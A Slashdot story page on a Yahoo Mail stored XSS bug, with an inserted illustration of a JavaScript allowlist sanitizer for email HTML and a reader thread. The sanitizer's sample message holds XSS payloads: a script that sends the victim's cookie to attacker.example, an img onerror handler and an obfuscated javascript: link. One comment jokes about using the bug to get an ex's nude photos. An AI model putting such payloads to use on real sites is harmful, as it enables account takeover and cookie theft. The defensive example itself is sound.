Yahoo Fixes Bug That Could Compromise Email Accounts When Opening an Email (klikki.fi)
An anonymous reader writes: Yahoo! has fixed a cross-site scripting bug that would have allowed attackers to fully compromise email accounts just by sending a malicious email. To lose control over their accounts, victims needed only to open the email. The researcher who discovered the bug said, "The code would be automatically evaluated when the message was viewed. ... We provided Yahoo with a proof of concept email that would forward the victim user's inbox to an external website, and an email virus which infects the Yahoo Mail account and attaches itself to all outgoing emails. The bug was fixed before any known exploits 'in the wild.'" Yahoo!'s bounty program awarded $10,000 for the research.
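The summary describes a stored XSS: HTML in an incoming message reached the webmail page unneutralised, so script in the message ran in the Yahoo Mail origin as soon as the victim viewed it. The fix for that class of bug is to render untrusted email HTML through an allowlist sanitizer. The following is an added illustration, not Yahoo's code and not taken from the klikki.fi write-up, and it does not reproduce the specific filter bypass that was reported: a minimal allowlist sanitizer in JavaScript that keeps a handful of formatting tags, drops every other tag (script, img, iframe, style and so on), strips all event-handler attributes, and only lets an href through if it is an http(s) or mailto URL. The tag names, attribute list and sample messages are the example's own choices; a production webmail client should use a mature library such as DOMPurify rather than the regex tokenizer used here for brevity.

```javascript
// Added example: allowlist sanitizer for untrusted email HTML.
// Not Yahoo's code; tag/attribute lists below are this example's own choices.
const ALLOWED_TAGS = new Set(["p", "br", "b", "i", "em", "strong", "a"]);
const VOID_TAGS = new Set(["br"]);
const ALLOWED_ATTRS = { a: new Set(["href"]) };

// Escape text so it can only ever render as text. Existing entity references
// are left alone so a legitimate "&amp;" in the message does not double-encode.
function escapeText(s) {
  return s
    .replace(/&(?!(?:#\d+|#x[0-9a-f]+|[a-z]+);)/gi, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Only http(s) and mailto links survive. Control characters are stripped first
// because browsers ignore them inside a scheme ("java\tscript:"), and any
// entity reference is rejected because it could decode into another scheme.
function safeHref(raw) {
  const v = raw.replace(/[\u0000-\u0020\u007f]/g, "");
  if (/&/.test(v)) return null;
  return /^(https?:\/\/|mailto:)/i.test(v) ? v : null;
}

// Parse `name`, `name=value`, `name="value"` and `name='value'` pairs.
function parseAttrs(s) {
  const attrs = {};
  const re = /([^\s=\/"'>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(s)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Walk the markup token by token; rebuild output only from allowed pieces.
// Disallowed tags are removed but their text content is kept (as escaped text),
// so "<script>...</script>" degrades to harmless visible text.
function sanitizeHtml(html) {
  const out = [];
  const open = []; // stack of currently open allowed tags, for balancing
  const token = /<!--[\s\S]*?-->|<\/?([a-zA-Z][a-zA-Z0-9]*)([^>]*)>|[^<]+|</g;
  let m;
  while ((m = token.exec(html)) !== null) {
    const tok = m[0];
    if (tok.startsWith("<!--")) continue;        // HTML comments dropped
    if (m[1] === undefined) {                     // plain text, or a stray "<"
      out.push(escapeText(tok));
      continue;
    }
    const name = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(name)) continue;        // unknown tag dropped
    if (tok.startsWith("</")) {
      const idx = open.lastIndexOf(name);
      if (idx === -1) continue;                   // close without matching open
      while (open.length > idx) out.push(`</${open.pop()}>`);
      continue;
    }
    const attrs = parseAttrs(m[2]);
    let attrText = "";
    for (const a of ALLOWED_ATTRS[name] || []) {
      if (attrs[a] === undefined) continue;
      const value = a === "href" ? safeHref(attrs[a]) : attrs[a];
      if (value !== null) attrText += ` ${a}="${escapeText(value)}"`;
    }
    out.push(`<${name}${attrText}>`);
    if (!VOID_TAGS.has(name)) open.push(name);
  }
  while (open.length) out.push(`</${open.pop()}>`); // close anything left open
  return out.join("");
}

// Constructed sample message (not a real exploit): mixes legitimate formatting
// with the kinds of payload a malicious sender would embed.
const SAMPLE_EMAIL =
  '<p>Hi, see <a href="https://example.com" onclick="steal()">this</a>.</p>' +
  "<script>fetch('https://attacker.example/?' + document.cookie)</script>" +
  '<img src=x onerror="alert(1)">' +
  '<a href="java\tscript:alert(1)">click</a>';

console.log(sanitizeHtml(SAMPLE_EMAIL));
```

Rendering `sanitizeHtml(body)` instead of the raw body means a message can still be bold or carry a link, but nothing in it can execute in the webmail origin; the NoScript question raised further down the thread is answered the same way: an allowlist on domains does not help against script that is already inside the trusted domain's page, only the server-side (or client-side) sanitizer does.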
Re: (Score:3)
I have one because of my ISP. I know people who have had their Yahoo address so long they keep it out of sheer inertia.
To me this comes down to the fundamental problem: why the hell do we keep trusting websites to run arbitrary scripts? And why the hell do we trust 3rd party scripts in web pages?
So some greedy bastard can give you an ad?
The average Yahoo user likely doesn't use script blockers, and isn't going to start out blocking them only to whitelist what they want.
I can barely convince my wife to ke
Pay for email (Score:2)
Like everyone everywhere is able to pay recurring fees for every little thing, yearly or monthly for decades on.
If you could get something like a lifetime subscription for mail at $100 I guess many would sign up (includes a choice of webmail like roundcube, squirrel etc.)
Perhaps $50, perhaps long term (20 years or delete after 5 years you didn't log in)
We're not only not willing to pay. Once you're paying for email, you have to keep paying (and have a valid debit card or banking account, etc.).
You may pay f
and we've had ads without scripts since forever (Score:2)
Ads are how we've decided that web-based services are paid for, given the lack of convenient and efficient micro-payments. However, you don't need scripts to have ads. Static images or even text work just fine. Hell, ads printed in ink on paper have paid for newspapers for a hundred years or more. So to whatever extent ads are needed to pay for "free" web sites, that does NOT imply that third-party scripts are required.
Re: (Score:1)
They still are; my ancient @bellsouth.net email address was migrated to the att.yahoo.com interface a few years ago.
Re: (Score:1)
For one, the researcher is out of Finland, not the US.
Also, depends on where you work. Maybe you can bill yourself $200/hr in SF, but where I am, you'd be lucky to get $20/hr, and 500 hours could be 3 months depending on how many hours you work some places.
Re: (Score:1)
For yahoo mail? really?
Why would blackhats buy an exploit for an email provider with a userbase of 3?
Amount of people (Score:2)
Re: (Score:3)
Prolly counting the spam-trap and inactive email accounts that folks have 'ginned up since it opened...
Now how am I going to get my ex-gfs nudes? (Score:1)
This fix will make it harder to get my hot ex-gf's nudie pics.
POP/IMAP Affected Also? (Score:1)
I take it you have to run a script in the email while reading it with the Yahoo web client open, so using a local client is safe. (I don't open mail from people I don't know anyway... and even then, scripts and images are disabled in my client.)
I was able to get myfirstname.mylastname@yahoo.com, so not only do I still use it, but I pay $20 annually for IMAP/SMTP access. I use Thunderbird or iOS Mail to read my mail and only rarely and occasionally use the web client to read mail.
However, their stupid secu
Re: POP/IMAP Affected Also? (Score:1)
How are they going to serve you ads?
Re: (Score:1)
Interesting. Thank you for that info.
Is that for a mobile device only or do you use a PC-based client?
Re: (Score:2)
imap.mail.yahoo.com Port:933 SSL/TLS, normal password
smtp.mail.yahoo.com Port:465 SSL/TLS, normal password
My android phone uses the same settings.
Would the attack have worked with NoScript enabled (Score:2)
... assuming only the yahoo domains were allowed?
Astounding (Score:2)
Yahoo, a multi-million, possibly billion dollar company can't secure their own goddamn webmail, and this is after having ~20 years of experience in being an email provider.
Fucking fabulous, great job guys, you da man.
Re: (Score:2)
It is not the same Y! as before. :/